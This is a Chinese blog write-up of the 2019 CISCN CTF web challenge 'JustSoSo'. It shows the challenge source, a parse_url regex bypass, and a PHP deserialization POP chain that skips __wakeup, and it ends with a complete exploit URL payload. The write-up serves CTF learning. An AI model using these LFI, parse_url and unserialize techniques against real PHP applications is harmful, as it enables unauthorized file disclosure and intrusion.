2019全国大学生信息安全竞赛 web JustSoso(parse_url解析漏洞+序列化)

最新推荐文章于 2024-04-28 22:15:00 发布
最新推荐文章于 2024-04-28 22:15:00 发布
阅读量4.5k 收藏 5
点赞数 3
分类专栏: ★ CTF # ——【 Code Audit】 文章标签: parse_url漏洞解析 __wakeup() 变量覆盖
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dyw_666666/article/details/89537881
版权

0x00

这道题是刚好在网上看到的,感觉跟moctf里有一道PUBG,还有bugku里的一道welcome to bugkuctf都很像,但又有些区别,所以就学习学习。

参考自:https://www.anquanke.com/post/id/177039

http://www.cnblogs.com/kagari/p/10758155.html

 

0x01

打开题目后右键查看源码

提示需要传参数,这里存在LFI漏洞(本地文件包含),常规操作伪协议读一下源码: 

index.php:

<?php
error_reporting(0);
$file = $_GET["file"];
$payload = $_GET["payload"];

if (!isset($file)) {
    echo 'Missing parameter' . '<br>';
}

if (preg_match("/flag/", $file)) {
    die('hack attacked!!!');
}

@include ($file);
if (isset($payload)) {
    $url = parse_url($_SERVER['REQUEST_URI']);
    parse_str($url['query'], $query);
    foreach ($query as $value) {
        if (preg_match("/flag/", $value)) {
            die('stop hacking!');
            exit();
        }
    }
    $payload = unserialize($payload);
} else {
    echo "Missing parameters";
}
?>

hint.php:

<?php
class Handle {
    private $handle;
    public function __wakeup() {
        foreach (get_object_vars($this) as $k => $v) {
            $this->$k = null;
        }
        echo "Waking upn";
    }
    public function __construct($handle) {
        $this->handle = $handle;
    }
    public function __destruct() {
        $this->handle->getFlag();
    }
}

class Flag {
    public $file;
    public $token;
    public $token_flag;
    function __construct($file) {
        $this->file = $file;
        $this->token_flag = $this->token = md5(rand(1, 10000));
    }
    public function getFlag() {
        $this->token_flag = md5(rand(1, 10000));
        if ($this->token === $this->token_flag) {
            if (isset($this->file)) {
                echo @highlight_file($this->file, true);
            }
        }
    }
}
?>

首先会对我们传入的参数调用parse_url函数进行解析,然后对我们的每个参数进行正则匹配,匹配到flag就直接退出。

这里就要用到parse_url的解析漏洞,可以查看一叶飘零师傅的文章:

https://skysec.top/2017/12/15/parse-url%E5%87%BD%E6%95%B0%E5%B0%8F%E8%AE%B0/

我们只需要加多两条/

就可以绕过正则匹配。

 

分析hint.php:

分别有两个类。

(1)Handle类,里面有一个private成员和三个成员函数。  

①private $handle;

②function __wakeup()

③function __construct()

④function __destruct()

(2)Flag类,里面有三个public成员和两个成员函数。

①public $file;

②public $token;

③public $token_flag;

④function __construct()

⑤function getFlag()

 

之后我们查看hint.php,看到

class Handle{}中引用了getFlag函数:

public function __destruct(){    
        $this->handle->getFlag();   
}

class Flag{}中定义了getFlag函数:

public function getFlag() {
    $this->token_flag = md5(rand(1, 10000));
    if ($this->token === $this->token_flag) {
        if (isset($this->file)) {
            echo @highlight_file($this->file, true);
        }
    }
}

所以最终我们的目的就是触发getFlag函数,且传入file参数为flag.php。

显然这里考察的是反序列化,因此我们构造pop链。

1,构造一个Flag类型得变量,传入参数为flag.php => $b = new Flag(“flag.php”);

2,构造一个Handle类型得变量,使内部$handle指向$b,这样__destruct时就行触发执行getFlag函数。=>

$a = new Handle($b);

3,Handle类中的__wakeup()会把变量清空,所以我们要在反序列化之后,修改一下变量数量,将payload中O:6:"Handle":1改为O:6:"Handle":2

4,要让token===token_flag,我们可以使用引用,使token变为token_flag的引用

$b = new Flag("flag.php");
$b->token = &$b->token_flag;
$a = new Handle($b);
echo serialize($a);

执行得到 O:6:"Handle":1:{s:14:"Handlehandle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"0b794a03744a03800313ca0f2e291294";s:10:"token_flag";R:4;}}

 

Payload:

///index.php?file=hint.php&payload=O:6:"Handle":2:{s:14:"%00Handle%00handle";O:4:"Flag":3:{s:4:"file";s:8:"flag.php";s:5:"token";s:32:"0b794a03744a03800313ca0f2e291294";s:10:"token_flag";R:4;}}

还有一点要注意:s:14:"Handlehandle" 为什么长度是12,前面的值却是14呢?

这是因为当成员属性为private时,在序列化后,Handle字串前后会各有一个0x00,因此长度为14。

类似的protect属性,则是在*前后各有一个0x00。可以自己在本地尝试一下。

0x00的url编码为%00,因此我们传参时要进行编码。

因此最终payload要加上%00。

烟敛寒林o
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
php parse uri,php parse_url()函数的漏洞 · C1imber’s Blog
weixin_34352633的博客
03-27 763
ctf比赛中经常遇到的一个知识点,记录一下,由于parse_url函数在解析url时存在的bug导致在某些情况下可以绕过正则的过滤来看代码
PHP反序列化漏洞这么学(细)!
jklbnm12的博客
08-13 280
简介 要想学习反序列化就要知道序列化的原理和作用,序列化就是把对象的成员变量转换为可以保存的和传输的字符串的过程,而反序列化就是把字符串再转换为原来的对象的变量,而这两个过程就很好的做到存储和传输数据。而序列化和反序列化分别通过函数serialize()和unserialize()来实现。 正文 介绍一下反序列化漏洞究竟是怎么产生的,其实在反序列化对象的时候,就会触发一些PHP的魔术方法,我知道大家都想知道这些魔术方法是怎么来的为什么会调用,这些魔术方法其实在设计类的时候写在类里面的,魔术方法函数有很多,要
[N1CTF 2018]eating_cms parse_url函数漏洞
qq_54929891的博客
05-14 498
进入就是一个登陆界面,随便输入一个账号密码抓包看看 发现有数据库语句,便试试万能密码 1'or'1'='1'# 发现被过滤了,一般这种题有个register.php和一个地方可以读取到源码的,我们要寻找试试 发现有注册界面,注册登陆一下 发现进入一个user.php页面,翻一下没有跟我们输入有关的回显,我们关注到有个page参数,不知道可不可以帮助我们读取到源码,直接伪协议试试 ?page=php://filter/read=convert.base64-encode/res..
大学生信息安全竞赛有那些?
最新发布
baimaozi008的博客
04-28 816
信息安全竞赛大学生提供了一个绝佳的平台,让他们能够学习、实践和展示网络安全技能,同时培养团队合作精神和解决问题的能力。
ctf-web-newphp
god_001的博客
04-30 629
题目地址:跳转提示 打开题目网址后,发现出现一段php代码: <?php // php版本:5.4.44 header("Content-type: text/html; charset=utf-8"); highlight_file(__FILE__); class evil{ public $hint; public function __construct($hint){ $this->hint = $hint; } pu.
buuctf -- warm up(远程文件包含漏洞)
qq_46485934的博客
09-25 1596
一.source.php 点开页面,是一个滑稽的表情。当然老规矩,右键审查页面源代码 发现了哥source.php,于是访问一下。 source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
JustSoSo
03-07
"JustSoSo"这个项目可能是一个使用JavaScript编写的代码库或者一个小型应用,而“铜”可能指的是项目的特点、主题或是项目的代号,但具体含义需要进一步的信息才能确定。下面,我们将深入探讨JavaScript的相关知识点...
迷你ASP服务器(miniASP)
05-08
- **Request**:用于获取客户端的请求信息,如表单数据、URL参数等。 - **Session**:存储每个用户会话的特定信息,保持用户状态。 - **Application**:在整个应用程序范围内共享数据,所有用户都能访问。 4. **...
VC中DLL的创建及调用方法[文].pdf
10-12
总的来说,VC++中的DLL编程提供了强大的代码复用和模块化能力,可以根据具体需求选择适合的DLL类型。无论是为了节省内存、支持多语言,还是为了方便代码维护和更新,熟练掌握DLL的创建和调用都是软件开发中不可或缺...
vue应用程序开发复习资料(1).docx
06-24
justsoso
PHP代码审计入门题
weixin_44022769的博客
03-28 1417
来源:https://buuoj.cn/challenges 点开出现一个滑稽脸 查看网页源代码,发现突破点: 在URL后面拼接这个source.php,发现了source.php文件: http://320a5c2d-1f76-4156-884c-00846ec2ff63.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { pub...
JustSoSo复现
Sk1y的博客
09-13 396
这个题目又碰到了,所以复现一下,过程中又学到了很多东西,记录记录 题目环境 2019国赛线上的一个题目JustSoSo,总共三个文件:index.php,hint.php,flag.php,贴一下源码 index.php <html> <?php error_reporting(0); $file = $_GET["file"]; $payload = $_GET["payload"]; if(!isset($file)){ echo
CTF 中的 PHP 漏洞利用总结
热门推荐
重新启程
10-12 2万+
基础知识 系统变量(超全局变量) 在全部作用域中始终可用的内置变量 1 2 3 4 5 6 7 8 9 $GLOBALS // 引用全局作用域中可用的全部变量 $_POST // 获取 post 数据,是一个字典 $_GET // 获取 get 数据,是一个字典 $_COOKIE // 获取 cookie $_SESSION // 获取 session $...
2019CISCN web题赛-JustSoSo;love_math(复现)
weixin_30466953的博客
05-02 890
0x00前言 这几天从网上找个CMS源码开始练习审计,盯着众多的代码debug调呀调头晕脑胀的,还不错找到个文件读取和一个ssrf... 上月底结束的CISCN线上赛,web四道,仔细研究的2道,做出了一道,刚好比赛时顺手把源码弄了下来,结合赛后师傅们的writeup复现一下这两道 0x01JustSoSo 有3个文件,index.php和hint.php可以通过文件filter来读...
parse_url解析 URL,返回其组成部分
刘阳龙Herman的专栏
10-09 1278
<br />parse_url<br />(PHP 4, PHP 5)<br />parse_url解析 URL,返回其组成部分<br />说明<br />array parse_url ( string $url )<br />本函数解析一个 URL 并返回一个关联数组,包含在 URL 中出现的各种组成部分。 <br />本函数不是用来验证给定 URL 的合法性的,只是将其分解为下面列出的部分。不完整的 URL 也被接受,parse_url() 会尝试尽量正确地将其解析。 <br />参数<br /
parse_url() 解析URL中的详细信息
啊春儿
07-05 2994
之前一直是用$_SERVER[”]数组来获取URL中的具体信息,今天发现了这个函数更为简单强大。 $Url = "http://username:password@baidu.com/OPP/?username=admin&password=admin"; $Url = parse_url($Url); echo "<pre>"; var_
利用parse_urlparse_str快速解析url
molaifeng的专栏
08-14 2013
今天讲一个快速解析url

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

烟敛寒林o

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值